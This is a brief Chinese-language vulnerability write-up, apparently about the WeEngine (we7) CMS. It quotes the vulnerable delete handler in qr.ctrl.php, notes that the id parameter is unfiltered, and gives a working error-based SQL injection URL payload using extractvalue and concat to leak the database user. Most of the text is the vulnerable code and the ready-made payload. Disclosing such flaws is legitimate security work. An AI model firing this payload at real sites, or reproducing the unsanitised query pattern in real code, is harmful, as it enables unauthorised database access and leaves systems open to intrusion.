漏洞文件:web/source/platform/qr.ctrl.php
代码行:204左右if($do == 'delsata') {
$id = $_GPC['id'];
$b = pdo_delete('qrcode_stat',array('id' =>$id, 'uniacid' => $_W['uniacid']));
if ($b){
message('删除成功',url('platform/qr/display'),'success');
}else{
message('删除失败',url('platform/qr/display'),'error');
}
}
$_GPC['id']未过滤
构造payload:http://localhost/we7/web/index.php
?c=platform
&a=qr
&do=delsata&id[0]=1\&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/user())))--+
demo测试